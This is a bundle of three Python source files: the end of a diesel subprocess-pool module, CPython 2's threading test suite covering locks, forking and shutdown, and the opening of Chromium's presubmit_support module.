"""Terminate the given proc.
That is all.
"""
proc.cleanup()
proc.proc.terminate()
class ConflictingCall(Exception):
pass
class Process(object):
"""A subprocess that cooperates with diesel's event hub.
Communication with the spawned process happens over a pipe. Data that
is to be sent to or received from the process is dispatched by the
event hub. This makes it easy to run CPU intensive work in a non-blocking
fashion and utilize multiple CPU cores.
"""
def __init__(self, func):
"""Creates a new Process instance that will call func.
The returned instance can be called as if it were func. The following
code will run ``time.sleep`` in a subprocess and execution will resume
when the remote call completes. Other green threads can run in the
meantime.
>>> time_sleep = Process(time.sleep)
>>> time_sleep(4.2)
>>> do_other_stuff()
"""
self.func = func
self.proc = None
self.caller = None
self.args = None
self.params = None
self.pipe = None
self.in_call = False
self.launch()
def launch(self):
"""Starts a subprocess and connects it to diesel's plumbing.
A pipe is created, registered with the event hub and used to
communicate with the subprocess.
"""
self.pipe, remote_pipe = mp.Pipe()
runtime.current_app.hub.register(
self.pipe,
self.handle_return_value,
self.send_arguments_to_process,
runtime.current_app.global_bail('Process error!'),
)
def wrapper(pipe):
while True:
try:
args, params = pipe.recv()
pipe.send(self.func(*args, **params))
except (SystemExit, KeyboardInterrupt):
pipe.close()
break
except Exception, e:
e.original_traceback = traceback.format_exc()
pipe.send(e)
self.proc = mp.Process(target=wrapper, args=(remote_pipe,))
self.proc.daemon = True
self.proc.start()
def cleanup(self):
runtime.current_app.hub.unregister(self.pipe)
def handle_return_value(self):
"""Wakes up the caller with the return value of the subprocess func.
Called by the event hub when data is ready.
"""
try:
result = self.pipe.recv()
except EOFError:
self.pipe.close()
self.proc.terminate()
else:
self.in_call = False
self.caller.wake(result)
def send_arguments_to_process(self):
"""Sends the arguments to the function to the remote process.
Called by the event hub after the instance has been called.
"""
runtime.current_app.hub.disable_write(self.pipe)
self.pipe.send((self.args, self.params))
def __call__(self, *args, **params):
"""Trigger the execution of self.func in the subprocess.
Switches control back to the event hub, letting other loops run until
the subprocess finishes computation. Returns the result of the
subprocess's call to self.func.
"""
if self.in_call:
msg = "Another loop (%r) is executing this process." % self.caller
raise ConflictingCall(msg)
runtime.current_app.hub.enable_write(self.pipe)
self.args = args
self.params = params
self.caller = core.current_loop
self.in_call = True
return self.caller.dispatch()
class NoSubProcesses(Exception):
pass
class ProcessPool(object):
"""A bounded pool of subprocesses.
An instance is callable, just like a Process, and will return the result
of executing the function in a subprocess. If all subprocesses are busy,
the caller will wait in a queue.
"""
def __init__(self, concurrency, handler):
"""Creates a new ProcessPool with subprocesses that run the handler.
Args:
concurrency (int): The number of subprocesses to spawn.
handler (callable): A callable that the subprocesses will execute.
"""
self.concurrency = concurrency
self.handler = handler
self.available_procs = Queue()
self.all_procs = []
def __call__(self, *args, **params):
"""Gets a process from the pool, executes it, and returns the results.
This call will block until there is a process available to handle it.
"""
if not self.all_procs:
raise NoSubProcesses("Did you forget to start the pool?")
try:
p = self.available_procs.get()
result = p(*args, **params)
return result
finally:
self.available_procs.put(p)
def pool(self):
"""A callable that starts the processes in the pool.
This is useful as the callable to pass to a diesel.Loop when adding a
ProcessPool to your application.
"""
for i in xrange(self.concurrency):
proc = spawn(self.handler)
self.available_procs.put(proc)
self.all_procs.append(proc)
if __name__ == '__main__':
import diesel
def sleep_and_return(secs):
import time
start = time.time()
time.sleep(secs)
return time.time() - start
sleep_pool = ProcessPool(2, sleep_and_return)
def main():
def waiting(ident):
print ident, "waiting ..."
t = sleep_pool(4)
print ident, "woken up after", t
diesel.fork(waiting, 'a')
diesel.fork(waiting, 'b')
diesel.fork(waiting, 'c')
for i in xrange(11):
print "busy!"
diesel.sleep(1)
div = spawn(lambda x,y: x/y)
try:
div(1,0)
except ZeroDivisionError, e:
diesel.log.error(e.original_traceback)
print '^^ That was an intentional exception.'
term(div)
psleep = spawn(sleep_and_return)
diesel.fork(psleep, 0.5)
diesel.fork(psleep, 0.5)
diesel.sleep(1)
print '^^ That was an intentional exception.'
diesel.quickstop()
diesel.quickstart(sleep_pool.pool, main)
|
test_threading.py
|
# expected: fail
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose, cpython_only
from test.script_helper import assert_python_ok
import random
import re
import sys
thread = test.test_support.import_module('thread')
threading = test.test_support.import_module('threading')
import time
import unittest
import weakref
import os
import subprocess
try:
import _testcapi
except ImportError:
_testcapi = None
from test import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assertTrue(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assertTrue(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = test.test_support.threading_setup()
def tearDown(self):
test.test_support.threading_cleanup(*self._threads)
test.test_support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertEqual(t.ident, None)
self.assertTrue(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assertTrue(not t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assertTrue(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
self.skipTest('platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
self.skipTest('requires ctypes')
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
self.assertFalse(rc == 2, "interpreted was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, '')
self.assertEqual(err, '')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getcheckinterval()
# Make the bug more likely to manifest.
sys.setcheckinterval(10)
try:
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(1 if t.is_alive() else 0)
else:
t.join()
pid, status = os.waitpid(pid, 0)
self.assertEqual(0, status)
finally:
sys.setcheckinterval(old_interval)
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@cpython_only
@unittest.skipIf(_testcapi is None, "need _testcapi module")
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "genereator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# An Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '1.8.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import ast # Exposed through the API.
import contextlib
import cPickle # Exposed through the API.
import cpplint
import cStringIO # Exposed through the API.
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import marshal # Exposed through the API.
import multiprocessing
import optparse
import os # Somewhat exposed through the API.
import pickle # Exposed through the API.
import random
import re # Exposed through the API.
import signal
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback # Exposed through the API.
import types
import unittest # Exposed through the API.
import urllib2 # Exposed through the API.
import urlparse
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners
import owners_finder
import presubmit_canned_checks
import scm
import subprocess2 as subprocess # Exposed through the API.
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate() and raise ProcessWasInterrupted.
class SigintHandler(object):
class ProcessWasInterrupted(Exception):
pass
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt())
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self):
with self.__lock:
self.__on_sigint()
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
if self.__got_sigint:
raise self.ProcessWasInterrupted
return stdout, stderr
sigint_handler = SigintHandler()
class ThreadPool(object):
def __init__(self, pool_size=None):
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of "python"
to vpython invocations.
"""
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
try:
start = time.time()
p = subprocess.Popen(cmd, **test.kwargs)
stdout, _ = sigint_handler.wait(p, test.stdin)
duration = time.time() - start
except OSError as e:
duration = time.time() - start
return test.message(
'%s exec failure (%4.2fs)\n %s' % (test.name, duration, e))
if p.returncode != 0:
return test.message(
'%s (%4.2fs) failed\n%s' % (test.name, duration, stdout))
if test.info:
return test.info('%s (%4.2fs)' % (test.name, duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
class PresubmitOutput(object):
def __init__(self, input_stream=None, output_stream=None):
self.input_stream = input_stream
self.output_stream = output_stream
self.reviewers = []
self.more_cc = []
self.written_output = []
self.error_count = 0
def prompt_yes_no(self, prompt_string):
self.write(prompt_string)
if self.input_stream:
response = self.input_stream.readline().strip().lower()
if response not in ('y', 'yes'):
self.fail()
else:
self.fail()
def fail(self):
self.error_count += 1
def should_continue(self):
return not self.error_count
def write(self, s):
self.written_output.append(s)
if self.output_stream:
self.output_stream.write(s)
def getvalue(self):
return ''.join(self.written_output)
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
